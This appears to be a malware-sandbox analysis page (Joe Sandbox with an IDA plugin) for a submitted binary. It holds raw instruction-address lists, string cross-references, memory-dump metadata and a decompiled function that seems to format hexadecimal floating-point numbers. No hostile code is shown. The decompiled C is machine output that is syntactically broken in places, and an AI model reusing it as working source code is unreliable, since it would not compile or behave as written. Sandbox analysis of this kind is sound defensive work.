0x013e11e3
0x013e11ea
0x013e11ef
0x013e11f3
0x013e11f5
0x013e11f5
0x013e11fc
0x013e1c58
0x00000000
0x013e1202
0x013e1202
0x013e1209
0x013e120b
0x013e120f
0x013e1212
0x013e1212
0x013e1216
0x013e10dd
0x013e10dd
0x013e10df
0x013e17ac
0x013e17ac
0x013e17b0
0x013e17b4
0x013e17b8
0x013e17bb
0x013e17bf
0x013e17c1
0x013e17c3
0x013e1a0e
0x013e1a10
0x00000000
0x00000000
0x00000000
0x00000000
0x013e17c9
0x013e17c9
0x013e17cd
0x013e1ba1
0x013e1ba4
0x013e1ba6
0x00000000
0x013e1bac
0x013e1bac
0x013e1bae
0x013e1a12
0x013e1a12
0x013e1a15
0x013e1a1d
0x013e1a22
0x013e1a26
0x013e1a29
0x013e1a30
0x013e1a32
0x013e1beb
0x013e1bf8
0x013e1bf8
0x00000000
0x013e1bed
0x013e1bed
0x013e1bf2
0x00000000
0x00000000
0x00000000
0x00000000
0x013e1bf2
0x013e1a38
0x013e1a38
0x013e1a38
0x013e1a3d
0x00000000
0x013e1a3f
0x013e1a3f
0x013e1a43
0x013e1a4b
0x013e1a4b
0x013e1a4e
0x013e1a52
0x013e1a52
0x013e1a56
0x013e1bd2
0x013e1bd5
0x013e1bd9
0x013e1bdd
0x013e1bdf
0x013e1c2e
0x013e1be1
0x013e1be1
0x013e1be1
0x00000000
0x00000000
0x00000000
0x00000000
0x013e1a56
0x013e1a3d
0x013e1bb4
0x013e1bb4
0x013e1bb8
0x013e1bba
0x00000000
0x013e1bba
0x013e1bae
0x013e17d3
0x013e17d3
0x013e17d3
0x013e17d8
0x013e1a5c
0x013e1a5c
0x013e1a60
0x013e1a65
0x00000000
0x013e17de
0x013e17de
0x013e17e0
0x013e17e4
0x013e17e6
0x013e1857
0x013e1857
0x013e1862
0x013e1867
0x013e1869
0x013e186b
0x00000000
0x00000000
0x013e17f0
0x013e17f5
0x013e180b
0x013e1810
0x013e1813
0x013e1815
0x013e181d
0x013e1820
0x013e1828
0x013e1831
0x013e1833
0x013e1837
0x013e183a
0x013e183e
0x013e1843
0x013e1847
0x013e184b
0x013e184e
0x013e184e
0x013e1851
0x013e1855
0x013e1855
0x013e186d
0x013e1871
0x013e1873
0x013e1875
0x013e1879
0x013e187b
0x013e187f
0x013e1882
0x00000000
0x013e1888
0x013e1888
0x013e1888
0x013e188b
0x013e188f
0x013e1894
0x013e1896
0x013e189a
0x013e189a
0x013e189e
0x013e18a3
0x013e18a3
0x013e1882
0x013e17d8
0x013e17cd
0x013e10e5
0x013e10e5
0x013e10e5
0x013e10ec
0x013e10fe
0x013e10fe
0x013e1102
0x013e1105
0x013e1107
0x013e1114
0x013e1114
0x013e1119
0x013e111c
0x013e1120
0x013e1124
0x013e19de
0x013e19e0
0x013e19e4
0x013e19e8
0x013e13fc
0x013e13fc
0x013e1400
0x013e1402
0x013e1648
0x013e164b
0x013e1653
0x013e1658
0x013e165c
0x013e165f
0x013e1666
0x013e1668
0x013e166c
0x00000000
0x013e1672
0x013e1672
0x013e167f
0x013e167f
0x00000000
0x013e1674
0x013e1674
0x013e1679
0x00000000
0x00000000
0x00000000
0x00000000
0x013e1679
0x013e1672
0x013e1408
0x013e1408
0x013e140b
0x013e140f
0x013e1412
0x013e1682
0x013e1682
0x013e1687
0x013e168a
0x013e1690
0x013e1694
0x013e1696
0x013e1698
0x013e1698
0x00000000
0x013e1418
0x013e1418
0x013e141b
0x013e1580
0x013e1580
0x00000000
0x013e1421
0x013e1421
0x013e1424
0x013e1426
0x00000000
0x013e142c
0x013e142c
0x013e1436
0x013e1436
0x013e1436
0x013e1439
0x013e143b
0x00000000
0x00000000
0x013e1430
0x013e1434
0x013e1434
0x013e143d
0x013e1426
0x013e141b
0x013e1412
0x013e112a
0x013e113d
0x013e1142
0x013e114a
0x013e114c
0x013e1154
0x013e1157
0x013e1159
0x013e12b0
0x013e12b5
0x013e12b7
0x013e115f
0x013e115f
0x013e1164
0x013e1167
0x013e116f
0x013e1171
0x013e117e
0x013e117e
0x013e1180
0x013e1180
0x013e1180
0x013e1185
0x00000000
0x013e1185
0x013e1109
0x013e1109
0x013e110e
0x013e19ab
0x013e19b0
0x013e19b4
0x013e19b8
0x00000000
0x013e19be
0x013e19be
0x013e19c3
0x013e19c7
0x013e19cb
0x013e19cf
0x013e19d2
0x013e19d4
0x013e19d4
0x00000000
0x00000000
0x00000000
0x013e110e
0x013e10ee
0x013e10ee
0x013e10f5
0x013e10f8
0x00000000
0x00000000
0x00000000
0x00000000
0x013e10f8
0x013e10ec
0x013e121c
0x013e121c
0x013e1220
0x013e1225
0x013e1229
0x013e122b
0x013e122f
0x013e1232
0x013e1a6e
0x013e1a6e
0x013e1a72
0x013e1a76
0x013e1a7a
0x013e1a7e
0x013e1a81
0x013e159e
0x013e159e
0x013e159e
0x013e15a1
0x013e15a3
0x00000000
0x00000000
0x013e1590
0x013e1592
0x013e1632
0x013e1636
0x013e163b
0x013e1640
0x013e1598
0x013e1598
0x013e159c
0x00000000
0x013e159c
0x00000000
0x013e1592
0x013e15a5
0x013e15a8
0x013e15aa
0x013e1238
0x013e1238
0x013e123a
0x013e1c37
0x013e1c3b
0x013e1c47
0x013e1c4b
0x013e1c50
0x013e1c3d
0x013e1c3d
0x013e1c3d
0x013e1240
0x013e1240
0x013e1244
0x013e1249
0x013e1249
0x013e124c
0x013e124c
0x013e1250
0x013e1254
0x013e1259
0x013e125d
0x013e1261
0x013e1261
0x013e1232
0x013e1216
0x00000000
0x013e10d0
0x013e10d3
0x013e10d8
0x00000000
0x013e10d8
0x013e1189
0x013e1263
0x013e1263
0x013e1266
0x013e126a
0x013e126f
0x013e1271
0x013e1275
0x013e1610
0x013e1614
0x013e127b
0x013e127b
0x013e127f
0x013e1281
0x013e1aa0
0x013e1aa0
0x013e1aa4
0x00000000
0x013e1287
0x013e1287
0x013e1289
0x00000000
0x013e128f
0x013e1292
0x013e1297
0x013e129b
0x013e129f
0x00000000
0x013e129f
0x013e1289
0x00000000
0x013e1281
0x013e0d41
0x013e0d41
0x013e0d43
0x00000000
0x013e0d49
0x013e0d49
0x013e0d49
0x013e0d4d
0x013e0d4f
0x00000000
0x013e0d55
0x013e0d68
0x013e0d6d
0x013e0d70
0x013e0d74
0x013e0d76
0x013e0d7b
0x013e0d7d
0x00000000
0x013e0d83
0x013e0d83
0x013e0d87
0x013e0d87
0x013e0d8a
0x013e0d8e
0x00000000
0x013e0d8e
0x013e0d7d
0x00000000
0x013e0d4f
0x013e0d43
0x013e0d3b
0x00000000
0x013e0d2f
0x00000000
0x013e0f3c
0x013e0f3c
0x013e0f43
0x013e0f47
0x013e0f4a
0x00000000
0x013e0f50
0x013e0f50
0x013e0f57
0x013e0f5e
0x013e0f60
0x013e1495
0x013e1495
0x013e1499
0x013e149d
0x013e14a5
0x013e14a9
0x013e14ad
0x013e14b0
0x013e14b2
0x013e14b7
0x013e14ba
0x013e14be
0x013e14c0
0x013e14c3
0x013e14c8
0x013e14cc
0x013e14d0
0x013e14d4
0x013e14d8
0x013e14dc
0x013e14e0
0x013e14e3
0x013e14e5
0x013e14e7
0x013e14e9
0x013e14eb
0x013e14ed
0x013e14ef
0x013e14f1
0x013e1c05
0x013e1564
0x013e1566
0x00000000
0x013e1c0b
0x00000000
0x013e1c0b
0x013e14f7
0x013e14f7
0x013e14f7
0x013e14fb
0x013e14ff
0x013e1503
0x013e151c
0x013e151c
0x013e1522
0x013e1525
0x013e1525
0x013e1528
0x013e152e
0x013e1530
0x013e1534
0x013e1538
0x013e153c
0x013e1540
0x013e1544
0x013e1548
0x013e154b
0x013e154e
0x013e1550
0x013e1552
0x013e1554
0x013e1556
0x013e1558
0x013e155a
0x00000000
0x00000000
0x013e1510
0x013e1514
0x013e1516
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x013e1516
0x013e155e
0x013e1560
0x013e1568
0x013e1568
0x013e156c
0x013e1570
0x013e1505
0x013e16a0
0x013e16a0
0x013e16a4
0x013e16a6
0x013e1b00
0x013e1b02
0x013e1b06
0x013e1b08
0x013e1bc3
0x013e1bc5
0x013e1bc7
0x013e1bcb
0x00000000
0x013e1b0e
0x013e1b0e
0x013e1b10
0x013e1b12
0x013e1c1e
0x013e1c20
0x013e1c24
0x00000000
0x013e1b1e
0x013e1b1e
0x013e1b20
0x013e1b24
0x00000000
0x013e1b26
0x013e1b26
0x013e1b28
0x013e1796
0x013e1796
0x013e1796
0x013e179a
0x013e179a
0x013e179d
0x00000000
0x00000000
0x013e1794
0x013e1794
0x013e179f
0x013e17a3
0x013e17a3
0x013e1b24
0x013e1b12
0x013e16ac
0x013e16ac
0x013e16ae
0x013e16b0
0x013e16b3
0x013e1b92
0x013e1b96
0x013e1b9a
0x013e1ac4
0x013e1ac4
0x013e1ac7
0x013e1aca
0x013e1ad8
0x013e1adc
0x013e1acc
0x013e1acc
0x013e1ace
0x013e1aeb
0x013e1aef
0x013e1af1
0x013e1af6
0x013e1af9
0x013e1ad0
0x013e1ad0
0x013e1ad4
0x013e1ad4
0x00000000
0x013e1ad4
0x013e1ace
0x013e1adf
0x013e1ae1
0x013e16b9
0x013e16b9
0x013e16bd
0x013e0aa2
0x013e0aa2
0x013e0aa2
0x013e16b3
0x013e16a6
0x013e1503
0x013e0f66
0x013e0f66
0x013e0f6a
0x013e0f6c
0x00000000
0x013e0f72
0x013e0f72
0x013e101f
0x00000000
0x013e0f78
0x013e0f7e
0x013e0f82
0x013e0f84
0x013e0f86
0x013e0f88
0x013e1021
0x013e1021
0x013e1023
0x013e1023
0x013e1025
0x013e1025
0x013e102c
0x013e1031
0x013e1033
0x013e1037
0x00000000
0x013e0f8e
0x013e0f8e
0x013e0f91
0x013e0f93
0x013e0f97
0x013e0d92
0x013e0d92
0x013e0d92
0x013e0d92
0x013e0d97
0x013e0d9c
0x013e0d9f
0x013e0d9f
0x013e0da2
0x013e0da6
0x013e0daa
0x013e0daf
0x013e0db1
0x013e0db5
0x013e0db9
0x013e0dbb
0x013e0dbb
0x013e0dbe
0x013e0dc2
0x013e0dc6
0x013e0dcb
0x013e0dcf
0x013e0dcf
0x00000000
0x013e0db9
0x013e0f88
0x00000000
0x013e0f72
0x013e0f6c
0x013e0f60
0x013e0f4a
0x013e0903
0x013e0908
0x013e0908
0x013e090a
0x00000000
0x013e090a
0x013e08fd
0x013e08e4
0x013e0878
0x013e086a
0x013e0864
0x013e0dd3
0x013e0dd3
0x013e0dd6
0x013e0dda
0x013e0dde
0x013e0de3
0x013e0dea
0x013e0df1
0x013e0df5
0x013e0df9
0x013e0dfb
0x013e0dff
0x013e0e02
0x013e0e04
0x013e0e08
0x013e0e0a
0x013e0e11
0x013e0e11
0x013e0e13
0x013e0e1a
0x013e0e1a
0x013e0e26
0x00000000
0x013e0640
0x013e0640
0x013e0642
0x013e0645
0x013e0648
0x013e064b
0x013e064d
0x00000000
0x013e064f
0x013e064f
0x013e0653
0x013e0655
0x013e0657
0x013e0657
0x00000000
0x00000000
0x013e05b0
0x013e05b7
0x013e05bd
0x013e05e6
0x00000000
0x00000000
0x013e0570
0x013e0577
0x013e057d
0x013e05a6
0x00000000

Strings

, xrefs: 013E1BF8
NaN, xrefs: 013E0590
Infinity, xrefs: 013E05D0
9, xrefs: 013E1A38

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID:
String ID: $9$Infinity$NaN
API String ID: 0-197352145
Opcode ID: 2062a68bdc36ec76966b94c0c5d1c392c62ca2b8e4891dac558c24a7a4609a0a
Instruction ID: a1c5b75346503025475c0514fa7a185cc3ad1576b9e08dba3e3d893f83cf102c
Opcode Fuzzy Hash: 2062a68bdc36ec76966b94c0c5d1c392c62ca2b8e4891dac558c24a7a4609a0a
Instruction Fuzzy Hash: F7D233B1A083968FD715DF29C08862ABBE1BFC8348F148D1DF99587395E7B1D8458F82

Uniqueness

Uniqueness Score: -1.00%

Function 013E1C70 Relevance: 6.7, APIs: 4, Instructions: 675COMMON

Download Yara Rule

APIs

localeconv.MSVCRT ref: 013E1C77

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: localeconv
String ID:
API String ID: 3737801528-0
Opcode ID: 838f2ca5d2c4496fab6b65de9856bfb4fb06267d3dd5247ecede09bab6be7e96
Instruction ID: d7ff4881bb42e0fea7c7a73ab23d369f79b6914cbfc445f3b967b3a11352836d
Opcode Fuzzy Hash: 838f2ca5d2c4496fab6b65de9856bfb4fb06267d3dd5247ecede09bab6be7e96
Instruction Fuzzy Hash: 9A42A371A083658FD711CF2DC48876BBBE6BF88308F094A5DE9859B381C375E945CB92

Uniqueness

Uniqueness Score: -1.00%

Function 013DF1C0 Relevance: 5.3, Strings: 4, Instructions: 342
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E013DF1C0(signed int __eax, void* __ecx, signed int __edx, void* __eflags) {
				signed int _t168;
				signed int _t171;
				signed int _t172;
				signed int _t173;
				signed int _t174;
				signed int _t177;
				signed int _t178;
				signed int _t186;
				signed int _t195;
				void* _t196;
				signed int _t199;
				signed int _t208;
				signed int _t215;
				signed int _t220;
				signed int _t223;
				signed int _t228;
				signed int _t234;
				intOrPtr _t238;
				void* _t239;
				signed int _t240;
				signed char _t241;
				signed int _t242;
				signed int _t247;
				signed int _t251;
				signed int _t252;
				signed char _t256;
				signed char _t261;
				signed char _t264;
				unsigned int _t266;
				signed int _t267;
				signed int _t288;
				signed int _t292;
				unsigned int _t293;
				signed int _t297;
				signed int _t298;
				void* _t299;
				void* _t300;
				void* _t302;
				signed int _t306;
				signed int _t307;
				unsigned int _t308;
				signed int _t309;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				void* _t314;
				signed int _t318;
				signed int _t320;
				signed int _t324;
				signed int _t325;
				signed int _t326;
				void* _t327;
				signed int _t328;
				void* _t329;

				_t239 = __ecx;
				 *(_t329 + 0x10) = __eax;
				_t238 =  *((intOrPtr*)(_t329 + 0x60));
				_t168 = (__eax | __edx) & 0xffffff00 | __eflags != 0x00000000;
				 *(_t329 + 0x14) = __edx;
				_t310 = _t168;
				if(__ecx != 0) {
					L2:
					 *(_t329 + 0x18) = _t239 - 3;
					L3:
					_t324 =  *(_t238 + 0xc);
					 *(_t329 + 4) = _t324 > 0;
					if(_t324 > 0xe) {
						__eflags = _t310;
						if(_t310 != 0) {
							L28:
							_t325 = 0x10;
							L31:
							_t171 = _t329 + 0x28;
							_t266 =  *(_t329 + 0x14);
							 *(_t329 + 4) = _t171;
							_t311 = _t171;
							_t172 =  *(_t238 + 4);
							 *(_t329 + 0xc) = _t172;
							_t173 = _t172 & 0x00000020;
							__eflags = _t173;
							 *(_t329 + 8) = _t173;
							_t174 =  *(_t329 + 0x10);
							do {
								_t297 = _t174 & 0x0000000f;
								__eflags = _t325 - 1;
								if(_t325 == 1) {
									__eflags = _t311 -  *(_t329 + 4);
									if(_t311 >  *(_t329 + 4)) {
										L62:
										 *_t311 = 0x2e;
										_t311 = _t311 + 1;
										L35:
										__eflags = _t297;
										if(_t297 != 0) {
											L56:
											_t240 = _t297;
											__eflags = _t297 - 9;
											if(_t297 <= 9) {
												L39:
												_t241 = _t240 + 0x30;
												__eflags = _t241;
												_t298 = _t311;
												L40:
												 *_t298 = _t241;
												_t311 = _t311 + 1;
												__eflags = _t311;
												goto L41;
											}
											_t298 = _t311;
											_t241 = _t297 + 0x00000037 |  *(_t329 + 8);
											goto L40;
										}
										_t240 = 0;
										__eflags = _t311 -  *(_t329 + 4);
										if(_t311 >  *(_t329 + 4)) {
											goto L39;
										}
										__eflags =  *(_t238 + 0xc);
										if( *(_t238 + 0xc) < 0) {
											goto L41;
										}
										L38:
										_t240 = 0;
										__eflags = 0;
										goto L39;
									}
									__eflags =  *(_t329 + 0xc) & 0x00000800;
									if(( *(_t329 + 0xc) & 0x00000800) != 0) {
										goto L62;
									}
									_t242 =  *(_t238 + 0xc);
									__eflags = _t242;
									if(_t242 <= 0) {
										__eflags = _t297;
										if(_t297 != 0) {
											goto L56;
										}
										__eflags = _t242;
										if(_t242 == 0) {
											goto L38;
										}
										break;
									}
									goto L62;
								}
								_t251 =  *(_t238 + 0xc);
								__eflags = _t251;
								if(_t251 > 0) {
									_t252 = _t251 - 1;
									__eflags = _t252;
									 *(_t238 + 0xc) = _t252;
								}
								goto L35;
								L41:
								_t174 = (_t266 << 0x00000020 | _t174) >> 4;
								_t266 = _t266 >> 4;
								_t325 = _t325 - 1;
								__eflags = _t325;
							} while (_t325 != 0);
							 *(_t329 + 8) =  *(_t329 + 0xc);
							__eflags = _t311 -  *(_t329 + 4);
							if(_t311 ==  *(_t329 + 4)) {
								__eflags =  *(_t238 + 0xc);
								if( *(_t238 + 0xc) <= 0) {
									L8:
									_t312 =  *(_t329 + 0xc);
									_t177 =  *(_t329 + 4);
									 *(_t329 + 8) = _t312;
									if((_t312 & 0x00000800) != 0) {
										 *(_t329 + 0x28) = 0x2e;
										_t177 = _t329 + 0x29;
									}
									L10:
									_t311 = _t177 + 1;
									 *_t177 = 0x30;
									_t178 =  *(_t238 + 8);
									 *(_t329 + 0x1c) = _t178;
									if(_t178 > 0) {
										L44:
										_t267 =  *(_t238 + 0xc);
										_t180 = _t311 -  *(_t329 + 4);
										_t326 =  *(_t329 + 0x18);
										__eflags = _t267;
										_t181 =  >  ? _t311 -  *(_t329 + 4) + _t267 : _t180;
										 *(_t329 + 0x10) = _t326;
										__eflags =  *(_t329 + 0xc) & 0x000001c0;
										_t118 = (0 | ( *(_t329 + 0xc) & 0x000001c0) != 0x00000000) + 5; // 0x5
										_t299 = ( >  ? _t311 -  *(_t329 + 4) + _t267 : _t180) + _t118;
										_t327 = _t299;
										_t247 = (_t326 * 0x66666667 >> 0x20 >> 2) - (_t326 >> 0x1f);
										__eflags = _t247;
										if(_t247 == 0) {
											_t300 = 2;
											L48:
											_t186 =  *(_t329 + 0x1c);
											__eflags = _t186 - _t327;
											if(_t186 <= _t327) {
												 *(_t238 + 8) = 0xffffffff;
												L12:
												if(( *(_t329 + 8) & 0x00000080) != 0) {
													L55:
													E013DDE50(0x2d, _t238);
													L15:
													E013DDE50(0x30, _t238);
													E013DDE50( *(_t238 + 4) & 0x00000020 | 0x00000058, _t238);
													_t195 =  *(_t238 + 8);
													if(_t195 <= 0 || ( *(_t238 + 5) & 0x00000002) == 0) {
														L19:
														_t328 =  *(_t329 + 4);
														if(_t311 >  *(_t329 + 4)) {
															do {
																_t311 = _t311 - 1;
																_t196 =  *_t311;
																__eflags = _t196 - 0x2e;
																if(_t196 == 0x2e) {
																	E013DE190(_t238);
																} else {
																	__eflags = _t196 - 0x2c;
																	if(_t196 == 0x2c) {
																		_t208 =  *(_t238 + 0x1c) & 0x0000ffff;
																		 *(_t329 + 0x26) = _t208;
																		__eflags = _t208;
																		if(__eflags != 0) {
																			E013DDEB0(_t329 + 0x26, _t238, 1, __eflags);
																		}
																	} else {
																		E013DDE50(_t196, _t238);
																	}
																}
																__eflags = _t311 - _t328;
															} while (_t311 != _t328);
															goto L64;
														} else {
															while(1) {
																L64:
																_t199 =  *(_t238 + 0xc);
																 *(_t238 + 0xc) = _t199 - 1;
																if(_t199 <= 0) {
																	break;
																}
																E013DDE50(0x30, _t238);
															}
															E013DDE50( *(_t238 + 4) & 0x00000020 | 0x00000050, _t238);
															 *(_t238 + 8) =  *(_t238 + 8) + _t300;
															 *(_t238 + 4) =  *(_t238 + 4) | 0x000001c0;
															asm("cdq");
															return E013DE6D0( *(_t329 + 0x10), _t238, _t238);
														}
													} else {
														 *(_t238 + 8) = _t195 - 1;
														do {
															E013DDE50(0x30, _t238);
															_t215 =  *(_t238 + 8);
															 *(_t238 + 8) = _t215 - 1;
														} while (_t215 > 0);
														goto L19;
													}
												}
												L13:
												if(( *(_t329 + 8) & 0x00000100) != 0) {
													E013DDE50(0x2b, _t238);
												} else {
													if(( *(_t329 + 8) & 0x00000040) != 0) {
														E013DDE50(0x20, _t238);
													}
												}
												goto L15;
											}
											_t220 = _t186 - _t327;
											__eflags =  *(_t329 + 0xc) & 0x00000600;
											if(( *(_t329 + 0xc) & 0x00000600) != 0) {
												 *(_t238 + 8) = _t220;
												goto L12;
											}
											 *(_t238 + 8) = _t220 - 1;
											__eflags = _t220;
											if(_t220 <= 0) {
												goto L12;
											}
											do {
												E013DDE50(0x20, _t238);
												_t223 =  *(_t238 + 8);
												 *(_t238 + 8) = _t223 - 1;
												__eflags = _t223;
											} while (_t223 > 0);
											 *(_t329 + 8) =  *(_t238 + 4);
											__eflags =  *(_t329 + 8) & 0x00000080;
											if(( *(_t329 + 8) & 0x00000080) == 0) {
												goto L13;
											}
											goto L55;
										}
										 *(_t329 + 0x18) = _t311;
										_t314 = _t299;
										do {
											_t327 = _t327 + 1;
											_t128 = _t327 + 2; // 0x6
											_t302 = _t128 - _t314;
											_t288 = (0x66666667 * _t247 >> 0x20 >> 2) - (_t247 >> 0x1f);
											__eflags = _t288;
											_t247 = _t288;
										} while (_t288 != 0);
										_t311 =  *(_t329 + 0x18);
										_t300 = _t302;
										goto L48;
									}
									L11:
									_t300 = 2;
									 *(_t329 + 0x10) =  *(_t329 + 0x18);
									goto L12;
								}
								 *(_t329 + 0x28) = 0x2e;
								_t177 = _t329 + 0x29;
								goto L10;
							}
							_t228 =  *(_t238 + 8);
							 *(_t329 + 0x1c) = _t228;
							__eflags = _t228;
							if(_t228 <= 0) {
								goto L11;
							}
							goto L44;
						}
						__eflags =  *(_t329 + 4);
						if( *(_t329 + 4) == 0) {
							L7:
							 *(_t329 + 4) = _t329 + 0x28;
							 *(_t329 + 0xc) =  *(_t238 + 4);
							goto L8;
						}
						goto L28;
					}
					_t256 = 0xe - _t324 << 2;
					_t306 =  !=  ? 4 : 0xbadbad << _t256;
					_t317 =  !=  ? 0 : 4 << _t256;
					_t318 = ( !=  ? 0 : 4 << _t256) + (( *(_t329 + 0x14) << 0x00000020 |  *(_t329 + 0x10)) >> 1);
					asm("adc edi, ecx");
					if(_t306 < 0) {
						_t292 = _t306 >> 3;
						_t234 = (_t306 << 0x00000020 | _t318) >> 3;
						 *(_t329 + 0x18) =  *(_t329 + 0x18) + 4;
						_t261 = 0xf - _t324 << 2;
						_t293 = _t292 >> _t261;
						__eflags = _t261 & 0x00000020;
						_t236 =  !=  ? _t293 : (_t292 << 0x00000020 | _t234) >> _t261;
						_t294 =  !=  ? 0 : _t293;
						 *(_t329 + 0x10) =  !=  ? _t293 : (_t292 << 0x00000020 | _t234) >> _t261;
						 *(_t329 + 0x14) =  !=  ? 0 : _t293;
						L30:
						_t325 = _t324 + 1;
						__eflags = _t325;
						goto L31;
					}
					_t307 = (_t306 << 0x00000020 | 0x00000004) << 1;
					_t320 = _t318 + _t318;
					_t264 = 0xf - _t324 << 2;
					_t308 = _t307 >> _t264;
					_t322 =  !=  ? _t308 : (_t307 << 0x00000020 | _t320) >> _t264;
					_t309 =  !=  ? 0 : _t308;
					 *(_t329 + 0x10) = 4;
					_t323 = ( !=  ? _t308 : (_t307 << 0x00000020 | _t320) >> _t264) | _t309;
					_t338 = ( !=  ? _t308 : (_t307 << 0x00000020 | _t320) >> _t264) | _t309;
					 *(_t329 + 0x14) = _t309;
					if((( !=  ? _t308 : (_t307 << 0x00000020 | _t320) >> _t264) | _t309) != 0 ||  *(_t329 + 4) != 0) {
						goto L30;
					} else {
						goto L7;
					}
				}
				 *(_t329 + 0x18) = 0;
				if(_t168 == 0) {
					goto L3;
				}
				goto L2;
			}

0x013df1c0
0x013df1c7
0x013df1cd
0x013df1d1
0x013df1d4
0x013df1d8
0x013df1dd
0x013df1ea
0x013df1ed
0x013df1f2
0x013df1f2
0x013df1f7
0x013df1ff
0x013df392
0x013df394
0x013df3a1
0x013df3a1
0x013df3e6
0x013df3e6
0x013df3ea
0x013df3ee
0x013df3f2
0x013df3f4
0x013df3f7
0x013df3fb
0x013df3fb
0x013df3fe
0x013df402
0x013df410
0x013df412
0x013df415
0x013df418
0x013df580
0x013df584
0x013df5a0
0x013df5a0
0x013df5a3
0x013df42b
0x013df42b
0x013df42d
0x013df561
0x013df561
0x013df563
0x013df566
0x013df444
0x013df444
0x013df444
0x013df447
0x013df449
0x013df449
0x013df44b
0x013df44b
0x00000000
0x013df44b
0x013df56f
0x013df571
0x00000000
0x013df571
0x013df433
0x013df435
0x013df439
0x00000000
0x00000000
0x013df43e
0x013df440
0x00000000
0x00000000
0x013df442
0x013df442
0x013df442
0x00000000
0x013df442
0x013df586
0x013df58e
0x00000000
0x00000000
0x013df590
0x013df593
0x013df595
0x013df681
0x013df683
0x00000000
0x00000000
0x013df689
0x013df68b
0x00000000
0x00000000
0x00000000
0x013df691
0x00000000
0x013df595
0x013df41e
0x013df421
0x013df423
0x013df425
0x013df425
0x013df428
0x013df428
0x00000000
0x013df44e
0x013df44e
0x013df452
0x013df455
0x013df455
0x013df455
0x013df45e
0x013df462
0x013df466
0x013df653
0x013df655
0x013df28c
0x013df28c
0x013df290
0x013df294
0x013df29e
0x013df2a0
0x013df2a5
0x013df2a5
0x013df2a9
0x013df2a9
0x013df2ac
0x013df2af
0x013df2b2
0x013df2b8
0x013df47b
0x013df47b
0x013df480
0x013df484
0x013df48c
0x013df48e
0x013df498
0x013df49c
0x013df4a7
0x013df4a7
0x013df4b1
0x013df4bb
0x013df4bb
0x013df4bd
0x013df696
0x013df4f2
0x013df4f2
0x013df4f6
0x013df4f8
0x013df625
0x013df2cc
0x013df2d1
0x013df550
0x013df557
0x013df2f0
0x013df2f7
0x013df307
0x013df30c
0x013df311
0x013df339
0x013df339
0x013df341
0x013df36a
0x013df36a
0x013df36d
0x013df370
0x013df373
0x013df602
0x013df379
0x013df379
0x013df37c
0x013df350
0x013df354
0x013df359
0x013df35c
0x013df61b
0x013df61b
0x013df37e
0x013df380
0x013df380
0x013df37c
0x013df362
0x013df362
0x00000000
0x013df343
0x013df5bc
0x013df5bc
0x013df5bc
0x013df5c2
0x013df5c7
0x00000000
0x00000000
0x013df5b7
0x013df5b7
0x013df5d4
0x013df5d9
0x013df5e2
0x013df5e9
0x013df5f6
0x013df5f6
0x013df319
0x013df31c
0x013df320
0x013df327
0x013df32c
0x013df332
0x013df335
0x00000000
0x013df320
0x013df311
0x013df2d7
0x013df2df
0x013df638
0x013df2e5
0x013df2ea
0x013df677
0x013df677
0x013df2ea
0x00000000
0x013df2df
0x013df4fe
0x013df500
0x013df508
0x013df642
0x00000000
0x013df642
0x013df511
0x013df514
0x013df516
0x00000000
0x00000000
0x013df520
0x013df527
0x013df52c
0x013df532
0x013df535
0x013df535
0x013df53c
0x013df540
0x013df545
0x00000000
0x00000000
0x00000000
0x013df545
0x013df4c3
0x013df4c7
0x013df4d0
0x013df4d5
0x013df4da
0x013df4e0
0x013df4e5
0x013df4e5
0x013df4e7
0x013df4e7
0x013df4eb
0x013df4ef
0x00000000
0x013df4ef
0x013df2be
0x013df2c3
0x013df2c8
0x00000000
0x013df2c8
0x013df65b
0x013df660
0x00000000
0x013df660
0x013df46c
0x013df46f
0x013df473
0x013df475
0x00000000
0x00000000
0x00000000
0x013df475
0x013df396
0x013df39b
0x013df27d
0x013df281
0x013df288
0x00000000
0x013df288
0x00000000
0x013df39b
0x013df219
0x013df228
0x013df22b
0x013df236
0x013df238
0x013df23c
0x013df3bb
0x013df3c0
0x013df3c4
0x013df3ca
0x013df3d0
0x013df3d2
0x013df3d5
0x013df3d8
0x013df3db
0x013df3df
0x013df3e3
0x013df3e3
0x013df3e3
0x00000000
0x013df3e3
0x013df247
0x013df24b
0x013df251
0x013df257
0x013df25c
0x013df25f
0x013df262
0x013df266
0x013df266
0x013df268
0x013df26c
0x00000000
0x00000000
0x00000000
0x00000000
0x013df26c
0x013df1e1
0x013df1e8
0x00000000
0x00000000
0x00000000

Strings

gfff, xrefs: 013DF493
@, xrefs: 013DF2E5
gfff, xrefs: 013DF4D0
., xrefs: 013DF65B

